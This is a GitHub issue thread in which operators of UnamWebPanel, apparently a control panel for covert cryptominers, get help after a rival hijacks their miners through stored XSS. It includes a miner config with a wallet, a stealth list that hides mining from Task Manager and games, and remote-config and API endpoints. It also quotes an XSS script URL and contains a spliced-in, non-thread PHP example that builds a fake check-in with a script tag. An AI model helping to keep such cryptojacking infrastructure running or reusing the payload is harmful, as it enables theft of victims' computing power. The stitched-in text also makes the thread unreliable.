UnamSanctam / UnamWebPanel

MIT License
163 stars, 60 forks

PANEL HACKED!! #313

Open gabjohn3 opened 5 months ago

gabjohn3 commented 5 months ago

Hi Unam, the web panel is not secure, it has been hacked several times. I tried adding a new .htaccess file and it is not working. Please help me out with how to secure the web panel.

gabjohn3 commented 5 months ago

Totally hacked, 2 web panels already hacked lol

UnamSanctam commented 5 months ago

You can disable error logging by removing this line: https://github.com/UnamSanctam/UnamWebPanel/blob/b8b30b7b0412fa2f817fb80df9b561291eddb186/UnamWebPanel/assets/php/session-header.php#L8

UnamSanctam commented 5 months ago

No, they are probably reading the error log. I always keep all error logs (it's in UNAM_LIB\Logs) clear as a habit (as do most other administrators), so it escaped my mind that some might not (since it might not be obvious).

UnamSanctam commented 5 months ago

Then they should not be able to access it; the login is not done using the database, only by reading the config.php file.

UnamSanctam commented 5 months ago

You can check the code, and the miners will come back on their next restart. Though I am working on the next version of the web panel.

gabjohn3 commented 5 months ago

Bro, that solution was not possible, already hacked again. I deleted the line you said and again the hacker gains access to my panel and redirects my miners to his wallet:

```json
{"algo":"rx/0","pool":"xmr-eu1.nanopool.org","port":10300,"wallet":"46vT411dNe4JrFXVnLijJBRmzyeNh9gZNH7r4smBT8GChwhb6iu2BAmEDDE31ouCxQEVLezhixbjeFJNcxWgMW646xoMFLq","password":"","nicehash":false,"ssltls":false,"max-cpu":100,"idle-wait":5,"idle-cpu":100,"stealth-targets":"Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Fallout4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe","kill-targets":"","stealth-fullscreen":true,"remote-config":"https://pastebin.com/raw/y45PvwAd","api-endpoint":"https://owenkruse.click/api/endpoint.php"}
```

And I cannot enter my panel again, it kicks me off every time I try to enter, please help us ASAP.

UnamSanctam commented 5 months ago

> and I cannot enter my panel again, it kicks me off every time I try to enter, please help us ASAP

If you cannot enter the web panel then it sounds like the hacker has not gained access to your web panel but to your web server. Is your web server secure?

gabjohn3 commented 5 months ago

It's not possible that the hacker hacks AWS, they hack the web panel bro u.u

gabjohn3 commented 5 months ago

Yes bro

UnamSanctam commented 5 months ago

> It's not possible that the hacker hacks AWS, they hack the web panel bro u.u We can enter the web panel but it is automatically closing when we log in, he does not have access to my backend either.

What is he doing? Only changing the configuration? I can only go by what you say.

gabjohn3 commented 5 months ago

No, he makes a JSON request (pretending to be a miner) and then if we click that we are thrown out of the panel and obviously he changed the whole config to his.

UnamSanctam commented 5 months ago

> No, he makes a JSON request (pretending to be a miner) and then if we click that we are thrown out of the panel and obviously he changed the whole config to his. He is automatically signing us out of the account when we first log in and transferring all our miners to his website account.

You mean an XSS attack? Can one of you send your database file after it has been hacked?

> Please add us on Discord and we can all figure this out together, discord = scar69, it's gonna be hard to fix over GitHub issue comments.

I'm banned from Discord for helping people with the miner.

gabjohn3 commented 5 months ago

I will send you my db, Unam, give me a sec.

UnamSanctam commented 5 months ago

> What about Telegram?

I've had two Telegram accounts in total but they both stopped working. I don't know if it's even possible to get banned, but maybe the numbers I had stopped working. Since then I haven't used Telegram.

gabjohn3 commented 5 months ago

Unam, I sent you the db and I checked that in the db there's an .htaccess file too, in the db folder. Check your mail please ASAP, ty.

gabjohn3 commented 5 months ago

He is using email only. I sent him the db, hope we can patch this ASAP to stop that mf.

UnamSanctam commented 5 months ago

Alright, looks like it's just a simple XSS attack then, here: https://owenkruse.github.io/code.js. It seems like the XSS prevention stopped working in PHP 8 when they changed how a function works (when I had to update compatibility). I'll change two files which should make it work for you.

gabjohn3 commented 5 months ago

So what should we do?

UnamSanctam commented 5 months ago

Try using this panel: UnamWebPanel.zip. I currently cannot test it, so I wrote it without testing; please tell me if it works alright.

UnamSanctam commented 5 months ago

I added htmlspecialchars into one line of class/class.ssp.php (the data_output function) and then also into the formatters in assets/php/datatables.php.

gabjohn3 commented 5 months ago

BRO I DOWNLOADED it, but in the db I can see the .htaccess from the hacker :O

gabjohn3 commented 5 months ago

```apache
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order Allow,Deny
    Deny from all
</IfModule>
Options -Indexes
```

UnamSanctam commented 5 months ago

No, that should be there, it prevents the db from being accessed.

gabjohn3 commented 5 months ago

Cool, I'm installing right now.

gabjohn3 commented 5 months ago

```
[07-Jan-2024 19:07:38 UTC] PHP Fatal error:  Uncaught Error: Call to a member function prepare() on bool in /var/www/html/__UNAM_LIB/unam_lib.php:29
Stack trace:
#0 /var/www/html/auth-ajax.php(11): unam_lib->unam_dbSelect()
#1 {main}
  thrown in /var/www/html/UNAM_LIB/unam_lib.php on line 29
[07-Jan-2024 19:08:25 UTC] PHP Warning:  file_put_contents(/var/www/html/UNAM_LIB/Logs/php-error-01-07-2024.html): Failed to open stream: Permission denied in /var/www/html/__UNAM_LIB/unam_lib.php on line 235
```

Which permissions are needed? It cannot save configs, I can't remember.

UnamSanctam commented 5 months ago

755 to the db folder and unamwebpanel.db if your folder/file owners are "correct".

gabjohn3 commented 5 months ago

The __UNAM_LIB also needs 777. I put 777 on the db folder too, I think that is insecure.

UnamSanctam commented 5 months ago

You don't need that, though it shouldn't really matter.

gabjohn3 commented 5 months ago

Okay bro, for now I'm not getting hacked, so I will deploy that web panel to the other one, hoping this helps.

gabjohn3 commented 5 months ago

12 minutes and still safe, I think it's working.

UnamSanctam commented 5 months ago

Great, it was just a simple XSS attack, so it's pretty simple to mitigate, and any miners should return to your panel once they restart.

gabjohn3 commented 5 months ago

Damn bro, I was very worried, I've been waiting like 14 hours for your response hehehe, thanks buddy.

UnamSanctam commented 5 months ago

Sure, you can message me via email at unams@protonmail.com, though the problem in this case was the XSS attack, unless you have something different.

UnamSanctam commented 5 months ago

> And how does it replace the computer name and make the script work? In 1.7.1 it appeared, but no changes are being made.

Anything can post data to it as long as it does so using the correct format; there's no way for the web panel to verify that a legitimate miner is contacting it. The text in the field was being run due to an XSS exploit.
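The attack chain the thread describes (an unauthenticated check-in carrying a script tag in the computer-name field, rendered unescaped into the panel's DataTables output) beside the htmlspecialchars fix applied to the data_output formatter, as an added example that is not UnamWebPanel's own code. The field name `computer_name`, the row layout and the constructed check-in array are assumptions made for illustration; the script URL is the one named earlier in the thread.

```php
<?php
// Added example, not UnamWebPanel's code. It shows why escaping has to happen
// on output: the panel cannot tell a real miner from a script, so every
// check-in field is attacker controlled, and an unescaped field that reaches
// the administrator's browser is stored XSS.

declare(strict_types=1);

// Constructed check-in, shaped like what any client could POST to the panel.
// Field names are assumptions; the script URL is the one from the thread.
$fakeMinerCheckin = [
    'computer_name' => '<script src="https://owenkruse.github.io/code.js"></script>',
    'hashrate'      => '12.3 kH/s',
];

// Before: the formatter returns the stored value unchanged, which is the
// behaviour the thread attributes to data_output after the PHP 8 update.
function formatCellVulnerable(string $value): string
{
    return $value;
}

// After: escape for an HTML context. ENT_QUOTES also covers single quotes, so
// the value is safe inside attribute values; ENT_SUBSTITUTE keeps invalid
// UTF-8 from silently producing an empty string; the explicit charset avoids
// depending on the PHP default.
function formatCellSafe(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// A DataTables-style row: the client inserts each cell as HTML, so whatever
// the formatter returns ends up in the DOM. Applying the formatter to every
// column (not just the one that was abused) is what closes the hole.
function buildTableRow(array $checkin, callable $formatter): array
{
    return [
        'name'     => $formatter($checkin['computer_name']),
        'hashrate' => $formatter($checkin['hashrate']),
    ];
}

// True when a cell still contains something the browser would parse as a tag.
function containsRawTag(string $html): bool
{
    return preg_match('/<\s*\/?\s*[a-z]/i', $html) === 1;
}

$vulnerable = buildTableRow($fakeMinerCheckin, 'formatCellVulnerable');
$safe       = buildTableRow($fakeMinerCheckin, 'formatCellSafe');

// json_encode does not escape < or >, so the vulnerable response carries the
// script tag straight to the client.
echo json_encode($vulnerable, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
echo json_encode($safe, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
echo 'vulnerable row still carries a tag: ', var_export(containsRawTag($vulnerable['name']), true), PHP_EOL;
echo 'escaped row carries a tag: ', var_export(containsRawTag($safe['name']), true), PHP_EOL;
```

Run it with `php example.php`. The point of escaping in the shared formatter rather than in one column handler is the one the thread itself arrives at: the first patch escaped a single line and still missed a field, and the version that held up was the one that escaped every output.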

gabjohn3 commented 5 months ago

OMG, that MF is still trying to hack the panels, Unam, look at the image.

UnamSanctam commented 5 months ago

Yes, but it's fine, it won't do anything now. He might have a script running that contacts your web panel automatically.

gabjohn3 commented 5 months ago

Please don't delete the updatewebpanel so everybody can update their web panels to the new version HAHA, he is losing hashrate :D

UnamSanctam commented 5 months ago

> We have already been hacked again dude..

Send your database here or to unams@protonmail.com, I might've missed some escape in the formatting since I'm not able to test it at the moment.

UnamSanctam commented 5 months ago

Here's a new version that sanitizes every input: UnamWebPanel.zip, please test it and see if everything works. I had to code it on my phone so I'm not able to test it at the moment, but @gabjohn3 did test it and it seems to work.

gabjohn3 commented 5 months ago

Yes, it's working. I don't see any hacking attempts, so I'm monitoring every single file in the logs, error logs and PHP files :D